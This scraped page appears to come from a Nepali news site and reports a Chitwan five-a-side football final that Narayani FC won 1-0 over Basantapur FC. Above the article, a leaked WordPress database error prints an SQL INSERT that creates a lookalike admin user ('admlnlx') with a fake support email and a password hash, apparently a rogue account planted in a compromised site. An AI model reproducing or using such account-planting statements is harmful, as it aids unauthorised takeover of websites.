WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BfDFT51QVTgp6TacPqf9Pn6uIoYC5R1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 00:25:49', '', 'admlnlx', 'admlnlx')
चितवन,पौष २९-
5 A साइड फुटबल अन्तरगत आज भएको फाइनल खेलमा नारायणी फुटबल क्लब द्दवारा बसन्तपुर फुटबल क्लबलाइ (१ ०) अन्तरले हराउदै उपाधि जित्न सफल भएको छ ।
चितवनमानै पहिलो पटक आयोजना गरिएको यस प्रतियोगिताको उपाधि रच्दै नारायणगढ फुटबल क्लबले रु, २०००० ट्रफि र प्रमाणपत्र हात पारेको छ । र प्रतियोगिताको दोस्रो स्थानमा रहेर बसन्तपुर फुटबल क्लबले रु, १०००० ट्रफि र प्रमाणपत्र जितेको छ ।